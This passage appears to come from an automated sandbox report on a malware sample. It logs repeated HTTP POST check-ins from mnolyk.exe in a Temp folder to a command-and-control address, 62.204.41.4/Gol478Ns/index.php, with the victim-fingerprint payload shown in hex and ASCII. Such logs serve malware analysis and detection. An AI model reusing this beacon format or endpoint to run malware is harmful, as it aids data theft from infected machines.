                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.435214996 CET589INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            401192.168.2.45009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:19.609783888 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.674107075 CET590INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            402192.168.2.45009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:19.882190943 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.946125984 CET591INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            403192.168.2.45009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:20.119029045 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.185551882 CET592INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            404192.168.2.45009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:20.353141069 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.416022062 CET593INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            405192.168.2.45010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:20.589445114 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.653697968 CET594INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            406192.168.2.45010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:20.831047058 CET594OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:20.897475958 CET595INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            407192.168.2.45010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:21.074270010 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.141248941 CET596INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            408192.168.2.45010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:21.322750092 CET596OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.387979031 CET597INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            409192.168.2.45010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:21.557053089 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.622164965 CET598INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            41192.168.2.44973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:36.780328035 CET230OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.848560095 CET230INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            410192.168.2.45010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:21.799160957 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:21.864048004 CET599INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            411192.168.2.45010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:22.067217112 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.132869005 CET600INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            412192.168.2.45010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:22.315654993 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.377834082 CET601INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            413192.168.2.45010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:22.559760094 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.625056982 CET602INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            414192.168.2.45010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:22.797983885 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:22.860326052 CET603INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            415192.168.2.45011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:23.028270006 CET603OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.093133926 CET604INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            416192.168.2.45011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:23.277591944 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.341398954 CET605INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            417192.168.2.45011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:23.514611959 CET605OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.580266953 CET606INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            418192.168.2.45011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:23.761965036 CET606OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.825628996 CET607INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            419192.168.2.45011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:23.997915983 CET607OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.063193083 CET608INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            42192.168.2.44973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:37.044349909 CET231OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
